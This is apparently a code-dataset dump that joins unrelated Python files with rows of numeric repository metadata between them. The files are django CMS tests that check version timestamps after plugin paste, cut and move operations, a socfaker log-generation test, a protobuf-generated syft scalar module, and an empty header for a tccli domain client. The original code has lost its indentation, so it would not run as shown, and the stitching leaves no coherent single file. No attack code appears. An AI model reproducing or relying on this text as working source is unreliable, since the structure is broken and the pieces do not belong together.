def test_paste_plugin(self):
version = factories.PageVersionFactory()
source_placeholder = factories.PlaceholderFactory(source=version.content)
target_placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
plugin = add_plugin(
source_placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_move_plugin_uri(plugin)
data = {
"plugin_id": plugin.pk,
"placeholder_id": target_placeholder.pk,
"target_language": version.content.language,
"move_a_copy": "true",
"target_position": 1,
}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_cut_plugin(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
user_settings = UserSettings.objects.create(
language=version.content.language,
user=self.get_superuser(),
clipboard=Placeholder.objects.create(slot="clipboard"),
)
plugin = add_plugin(
placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_move_plugin_uri(plugin)
data = {
"plugin_id": plugin.pk,
"target_language": version.content.language,
"placeholder_id": user_settings.clipboard_id,
}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_move_plugin(self):
version = factories.PageVersionFactory()
source_placeholder = factories.PlaceholderFactory(source=version.content)
target_placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
plugin = add_plugin(
source_placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_move_plugin_uri(plugin)
data = {
"plugin_id": plugin.pk,
"target_language": version.content.language,
"placeholder_id": target_placeholder.pk,
"target_position": 1,
}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
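# Illustrative sketch, not part of the original test suite: every test above
# follows the same shape -- run a placeholder/plugin operation inside
# freeze_time as the superuser, then assert that the Version's modified
# timestamp was bumped to the frozen time. A helper the tests could share;
# "operation" is a hypothetical callable that performs the request and
# returns the HTTP response.
def assert_operation_touches_version(testcase, version, operation, expected_status=200):
    dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
    with freeze_time(dt):
        with testcase.login_user_context(testcase.get_superuser()):
            response = operation()
    testcase.assertEqual(response.status_code, expected_status)
    version = Version.objects.get(pk=version.pk)
    testcase.assertEqual(version.modified, dt)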
| 38.50813
| 97
| 0.632007
| 966
| 9,473
| 6.033126
| 0.090062
| 0.069664
| 0.064173
| 0.090597
| 0.85175
| 0.840769
| 0.834248
| 0.825841
| 0.825841
| 0.825841
| 0
| 0.01319
| 0.27172
| 9,473
| 245
| 98
| 38.665306
| 0.83157
| 0
| 0
| 0.717172
| 0
| 0
| 0.045392
| 0.004434
| 0
| 0
| 0
| 0
| 0.09596
| 1
| 0.050505
| false
| 0
| 0.040404
| 0
| 0.09596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
814ddb2f331f68fd127a3353c52ccbef7d8bdd79
| 223
|
py
|
Python
|
tests/test_socfaker_logs_windows_eventlog.py
|
atstpls/soc-faker
|
119fcb9c4329a918ef9001ac5eaa36251b862bf0
|
[
"MIT"
] | 122
|
2020-02-21T16:06:54.000Z
|
2022-03-21T13:53:03.000Z
|
tests/test_socfaker_logs_windows_eventlog.py
|
atstpls/soc-faker
|
119fcb9c4329a918ef9001ac5eaa36251b862bf0
|
[
"MIT"
] | 13
|
2020-01-29T16:37:05.000Z
|
2022-01-27T21:30:10.000Z
|
tests/test_socfaker_logs_windows_eventlog.py
|
atstpls/soc-faker
|
119fcb9c4329a918ef9001ac5eaa36251b862bf0
|
[
"MIT"
] | 20
|
2020-04-10T11:59:29.000Z
|
2022-02-10T09:20:26.000Z
|
def test_socfaker_logs_windows_eventlog(socfaker_fixture):
assert socfaker_fixture.logs.windows.eventlog()
def test_socfaker_logs_windows_sysmon_logs(socfaker_fixture):
assert socfaker_fixture.logs.windows.sysmon()
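# Illustrative sketch, not part of the original test file: both tests rely on
# a "socfaker_fixture" pytest fixture defined elsewhere (presumably the
# suite's conftest.py). A minimal version of such a fixture, assuming
# soc-faker exposes a SocFaker class as its public entry point.
import pytest
from socfaker import SocFaker

@pytest.fixture
def socfaker_fixture():
    return SocFaker()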
| 44.6
| 61
| 0.856502
| 29
| 223
| 6.137931
| 0.310345
| 0.247191
| 0.168539
| 0.213483
| 0.820225
| 0.52809
| 0.52809
| 0
| 0
| 0
| 0
| 0
| 0.071749
| 223
| 5
| 62
| 44.6
| 0.859903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8171538efcf108c05d6c10e2d8869f07afd208aa
| 27,193
|
py
|
Python
|
packages/syft/src/syft/proto/core/adp/scalar_pb2.py
|
callezenwaka/PySyft
|
2545c302441cfe727ec095c4f9aa136bff02be32
|
[
"Apache-1.1"
] | 1
|
2021-09-14T10:56:43.000Z
|
2021-09-14T10:56:43.000Z
|
packages/syft/src/syft/proto/core/adp/scalar_pb2.py
|
callezenwaka/PySyft
|
2545c302441cfe727ec095c4f9aa136bff02be32
|
[
"Apache-1.1"
] | 2
|
2021-04-02T10:12:44.000Z
|
2021-04-02T10:12:50.000Z
|
packages/syft/src/syft/proto/core/adp/scalar_pb2.py
|
callezenwaka/PySyft
|
2545c302441cfe727ec095c4f9aa136bff02be32
|
[
"Apache-1.1"
] | 1
|
2021-08-19T12:23:01.000Z
|
2021-08-19T12:23:01.000Z
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: proto/core/adp/scalar.proto
"""Generated protocol buffer code."""
# third party
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
# syft absolute
from syft.proto.core.adp import entity_pb2 as proto_dot_core_dot_adp_dot_entity__pb2
from syft.proto.core.common import (
common_object_pb2 as proto_dot_core_dot_common_dot_common__object__pb2,
)
DESCRIPTOR = _descriptor.FileDescriptor(
name="proto/core/adp/scalar.proto",
package="syft.core.adp",
syntax="proto3",
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x1bproto/core/adp/scalar.proto\x12\rsyft.core.adp\x1a%proto/core/common/common_object.proto\x1a\x1bproto/core/adp/entity.proto"7\n\x12IntermediateScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID"\xb8\x01\n\nBaseScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12\x14\n\x07min_val\x18\x02 \x01(\x02H\x00\x88\x01\x01\x12\x12\n\x05value\x18\x03 \x01(\x02H\x01\x88\x01\x01\x12\x14\n\x07max_val\x18\x04 \x01(\x02H\x02\x88\x01\x01\x12%\n\x06\x65ntity\x18\x05 \x01(\x0b\x32\x15.syft.core.adp.EntityB\n\n\x08_min_valB\x08\n\x06_valueB\n\n\x08_max_val"<\n\x17IntermediateGammaScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID"\xb9\x01\n\x0bGammaScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12\x14\n\x07min_val\x18\x02 \x01(\x02H\x00\x88\x01\x01\x12\x12\n\x05value\x18\x03 \x01(\x02H\x01\x88\x01\x01\x12\x14\n\x07max_val\x18\x04 \x01(\x02H\x02\x88\x01\x01\x12%\n\x06\x65ntity\x18\x05 \x01(\x0b\x32\x15.syft.core.adp.EntityB\n\n\x08_min_valB\x08\n\x06_valueB\n\n\x08_max_val"\x9b\x01\n\x15IntermediatePhiScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12%\n\x06\x65ntity\x18\x02 \x01(\x0b\x32\x15.syft.core.adp.Entity\x12.\n\x05gamma\x18\x03 \x01(\x0b\x32\x1a.syft.core.adp.GammaScalarH\x00\x88\x01\x01\x42\x08\n\x06_gamma"\xf1\x01\n\tPhiScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12\x14\n\x07min_val\x18\x02 \x01(\x02H\x00\x88\x01\x01\x12\x12\n\x05value\x18\x03 \x01(\x02H\x01\x88\x01\x01\x12\x14\n\x07max_val\x18\x04 \x01(\x02H\x02\x88\x01\x01\x12%\n\x06\x65ntity\x18\x05 \x01(\x0b\x32\x15.syft.core.adp.Entity\x12.\n\x05gamma\x18\x06 \x01(\x0b\x32\x1a.syft.core.adp.GammaScalarH\x03\x88\x01\x01\x42\n\n\x08_min_valB\x08\n\x06_valueB\n\n\x08_max_valB\x08\n\x06_gammab\x06proto3',
dependencies=[
proto_dot_core_dot_common_dot_common__object__pb2.DESCRIPTOR,
proto_dot_core_dot_adp_dot_entity__pb2.DESCRIPTOR,
],
)
_INTERMEDIATESCALAR = _descriptor.Descriptor(
name="IntermediateScalar",
full_name="syft.core.adp.IntermediateScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.IntermediateScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=114,
serialized_end=169,
)
_BASESCALAR = _descriptor.Descriptor(
name="BaseScalar",
full_name="syft.core.adp.BaseScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.BaseScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="min_val",
full_name="syft.core.adp.BaseScalar.min_val",
index=1,
number=2,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="value",
full_name="syft.core.adp.BaseScalar.value",
index=2,
number=3,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="max_val",
full_name="syft.core.adp.BaseScalar.max_val",
index=3,
number=4,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="entity",
full_name="syft.core.adp.BaseScalar.entity",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="_min_val",
full_name="syft.core.adp.BaseScalar._min_val",
index=0,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_value",
full_name="syft.core.adp.BaseScalar._value",
index=1,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_max_val",
full_name="syft.core.adp.BaseScalar._max_val",
index=2,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
],
serialized_start=172,
serialized_end=356,
)
_INTERMEDIATEGAMMASCALAR = _descriptor.Descriptor(
name="IntermediateGammaScalar",
full_name="syft.core.adp.IntermediateGammaScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.IntermediateGammaScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=358,
serialized_end=418,
)
_GAMMASCALAR = _descriptor.Descriptor(
name="GammaScalar",
full_name="syft.core.adp.GammaScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.GammaScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="min_val",
full_name="syft.core.adp.GammaScalar.min_val",
index=1,
number=2,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="value",
full_name="syft.core.adp.GammaScalar.value",
index=2,
number=3,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="max_val",
full_name="syft.core.adp.GammaScalar.max_val",
index=3,
number=4,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="entity",
full_name="syft.core.adp.GammaScalar.entity",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="_min_val",
full_name="syft.core.adp.GammaScalar._min_val",
index=0,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_value",
full_name="syft.core.adp.GammaScalar._value",
index=1,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_max_val",
full_name="syft.core.adp.GammaScalar._max_val",
index=2,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
],
serialized_start=421,
serialized_end=606,
)
_INTERMEDIATEPHISCALAR = _descriptor.Descriptor(
name="IntermediatePhiScalar",
full_name="syft.core.adp.IntermediatePhiScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.IntermediatePhiScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="entity",
full_name="syft.core.adp.IntermediatePhiScalar.entity",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="gamma",
full_name="syft.core.adp.IntermediatePhiScalar.gamma",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="_gamma",
full_name="syft.core.adp.IntermediatePhiScalar._gamma",
index=0,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
],
serialized_start=609,
serialized_end=764,
)
_PHISCALAR = _descriptor.Descriptor(
name="PhiScalar",
full_name="syft.core.adp.PhiScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.PhiScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="min_val",
full_name="syft.core.adp.PhiScalar.min_val",
index=1,
number=2,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="value",
full_name="syft.core.adp.PhiScalar.value",
index=2,
number=3,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="max_val",
full_name="syft.core.adp.PhiScalar.max_val",
index=3,
number=4,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="entity",
full_name="syft.core.adp.PhiScalar.entity",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="gamma",
full_name="syft.core.adp.PhiScalar.gamma",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="_min_val",
full_name="syft.core.adp.PhiScalar._min_val",
index=0,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_value",
full_name="syft.core.adp.PhiScalar._value",
index=1,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_max_val",
full_name="syft.core.adp.PhiScalar._max_val",
index=2,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_gamma",
full_name="syft.core.adp.PhiScalar._gamma",
index=3,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
],
serialized_start=767,
serialized_end=1008,
)
_INTERMEDIATESCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_BASESCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_BASESCALAR.fields_by_name[
"entity"
].message_type = proto_dot_core_dot_adp_dot_entity__pb2._ENTITY
_BASESCALAR.oneofs_by_name["_min_val"].fields.append(
_BASESCALAR.fields_by_name["min_val"]
)
_BASESCALAR.fields_by_name["min_val"].containing_oneof = _BASESCALAR.oneofs_by_name[
"_min_val"
]
_BASESCALAR.oneofs_by_name["_value"].fields.append(_BASESCALAR.fields_by_name["value"])
_BASESCALAR.fields_by_name["value"].containing_oneof = _BASESCALAR.oneofs_by_name[
"_value"
]
_BASESCALAR.oneofs_by_name["_max_val"].fields.append(
_BASESCALAR.fields_by_name["max_val"]
)
_BASESCALAR.fields_by_name["max_val"].containing_oneof = _BASESCALAR.oneofs_by_name[
"_max_val"
]
_INTERMEDIATEGAMMASCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_GAMMASCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_GAMMASCALAR.fields_by_name[
"entity"
].message_type = proto_dot_core_dot_adp_dot_entity__pb2._ENTITY
_GAMMASCALAR.oneofs_by_name["_min_val"].fields.append(
_GAMMASCALAR.fields_by_name["min_val"]
)
_GAMMASCALAR.fields_by_name["min_val"].containing_oneof = _GAMMASCALAR.oneofs_by_name[
"_min_val"
]
_GAMMASCALAR.oneofs_by_name["_value"].fields.append(
_GAMMASCALAR.fields_by_name["value"]
)
_GAMMASCALAR.fields_by_name["value"].containing_oneof = _GAMMASCALAR.oneofs_by_name[
"_value"
]
_GAMMASCALAR.oneofs_by_name["_max_val"].fields.append(
_GAMMASCALAR.fields_by_name["max_val"]
)
_GAMMASCALAR.fields_by_name["max_val"].containing_oneof = _GAMMASCALAR.oneofs_by_name[
"_max_val"
]
_INTERMEDIATEPHISCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_INTERMEDIATEPHISCALAR.fields_by_name[
"entity"
].message_type = proto_dot_core_dot_adp_dot_entity__pb2._ENTITY
_INTERMEDIATEPHISCALAR.fields_by_name["gamma"].message_type = _GAMMASCALAR
_INTERMEDIATEPHISCALAR.oneofs_by_name["_gamma"].fields.append(
_INTERMEDIATEPHISCALAR.fields_by_name["gamma"]
)
_INTERMEDIATEPHISCALAR.fields_by_name[
"gamma"
].containing_oneof = _INTERMEDIATEPHISCALAR.oneofs_by_name["_gamma"]
_PHISCALAR.fields_by_name[
"id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_PHISCALAR.fields_by_name[
"entity"
].message_type = proto_dot_core_dot_adp_dot_entity__pb2._ENTITY
_PHISCALAR.fields_by_name["gamma"].message_type = _GAMMASCALAR
_PHISCALAR.oneofs_by_name["_min_val"].fields.append(
_PHISCALAR.fields_by_name["min_val"]
)
_PHISCALAR.fields_by_name["min_val"].containing_oneof = _PHISCALAR.oneofs_by_name[
"_min_val"
]
_PHISCALAR.oneofs_by_name["_value"].fields.append(_PHISCALAR.fields_by_name["value"])
_PHISCALAR.fields_by_name["value"].containing_oneof = _PHISCALAR.oneofs_by_name[
"_value"
]
_PHISCALAR.oneofs_by_name["_max_val"].fields.append(
_PHISCALAR.fields_by_name["max_val"]
)
_PHISCALAR.fields_by_name["max_val"].containing_oneof = _PHISCALAR.oneofs_by_name[
"_max_val"
]
_PHISCALAR.oneofs_by_name["_gamma"].fields.append(_PHISCALAR.fields_by_name["gamma"])
_PHISCALAR.fields_by_name["gamma"].containing_oneof = _PHISCALAR.oneofs_by_name[
"_gamma"
]
DESCRIPTOR.message_types_by_name["IntermediateScalar"] = _INTERMEDIATESCALAR
DESCRIPTOR.message_types_by_name["BaseScalar"] = _BASESCALAR
DESCRIPTOR.message_types_by_name["IntermediateGammaScalar"] = _INTERMEDIATEGAMMASCALAR
DESCRIPTOR.message_types_by_name["GammaScalar"] = _GAMMASCALAR
DESCRIPTOR.message_types_by_name["IntermediatePhiScalar"] = _INTERMEDIATEPHISCALAR
DESCRIPTOR.message_types_by_name["PhiScalar"] = _PHISCALAR
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
IntermediateScalar = _reflection.GeneratedProtocolMessageType(
"IntermediateScalar",
(_message.Message,),
{
"DESCRIPTOR": _INTERMEDIATESCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.IntermediateScalar)
},
)
_sym_db.RegisterMessage(IntermediateScalar)
BaseScalar = _reflection.GeneratedProtocolMessageType(
"BaseScalar",
(_message.Message,),
{
"DESCRIPTOR": _BASESCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.BaseScalar)
},
)
_sym_db.RegisterMessage(BaseScalar)
IntermediateGammaScalar = _reflection.GeneratedProtocolMessageType(
"IntermediateGammaScalar",
(_message.Message,),
{
"DESCRIPTOR": _INTERMEDIATEGAMMASCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.IntermediateGammaScalar)
},
)
_sym_db.RegisterMessage(IntermediateGammaScalar)
GammaScalar = _reflection.GeneratedProtocolMessageType(
"GammaScalar",
(_message.Message,),
{
"DESCRIPTOR": _GAMMASCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.GammaScalar)
},
)
_sym_db.RegisterMessage(GammaScalar)
IntermediatePhiScalar = _reflection.GeneratedProtocolMessageType(
"IntermediatePhiScalar",
(_message.Message,),
{
"DESCRIPTOR": _INTERMEDIATEPHISCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.IntermediatePhiScalar)
},
)
_sym_db.RegisterMessage(IntermediatePhiScalar)
PhiScalar = _reflection.GeneratedProtocolMessageType(
"PhiScalar",
(_message.Message,),
{
"DESCRIPTOR": _PHISCALAR,
"__module__": "proto.core.adp.scalar_pb2"
# @@protoc_insertion_point(class_scope:syft.core.adp.PhiScalar)
},
)
_sym_db.RegisterMessage(PhiScalar)
# @@protoc_insertion_point(module_scope)
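# Illustrative sketch, not part of the generated module (the file above is
# produced by protoc and must not be edited): how the generated classes are
# typically used -- build a BaseScalar, round-trip it through the wire format,
# and read a field back. The import path assumes the package layout shown for
# this file.
from syft.proto.core.adp.scalar_pb2 import BaseScalar

msg = BaseScalar()
msg.value = 0.5      # proto3 optional float fields declared above
msg.min_val = 0.0
msg.max_val = 1.0
wire = msg.SerializeToString()           # serialize to bytes
decoded = BaseScalar.FromString(wire)    # parse back into a new message
assert decoded.value == msg.value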
| 32.921308
| 1,815
| 0.623028
| 2,933
| 27,193
| 5.395159
| 0.057961
| 0.040445
| 0.064838
| 0.066544
| 0.835313
| 0.804285
| 0.740331
| 0.689017
| 0.680801
| 0.680801
| 0
| 0.034491
| 0.273931
| 27,193
| 825
| 1,816
| 32.961212
| 0.766967
| 0.024124
| 0
| 0.757962
| 1
| 0.001274
| 0.156793
| 0.124477
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007643
| 0
| 0.007643
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81736639ac28a4db56d5007f839f5b46e6f9547f
| 71,358
|
py
|
Python
|
tccli/services/domain/domain_client.py
|
tencentcloudapi-test/tencentcloud-cli
|
da9733765df2b405b83b7acff48256f31e053ab1
|
[
"Apache-2.0"
] | null | null | null |
tccli/services/domain/domain_client.py
|
tencentcloudapi-test/tencentcloud-cli
|
da9733765df2b405b83b7acff48256f31e053ab1
|
[
"Apache-2.0"
] | null | null | null |
tccli/services/domain/domain_client.py
|
tencentcloudapi-test/tencentcloud-cli
|
da9733765df2b405b83b7acff48256f31e053ab1
|
[
"Apache-2.0"
] | null | null | null |
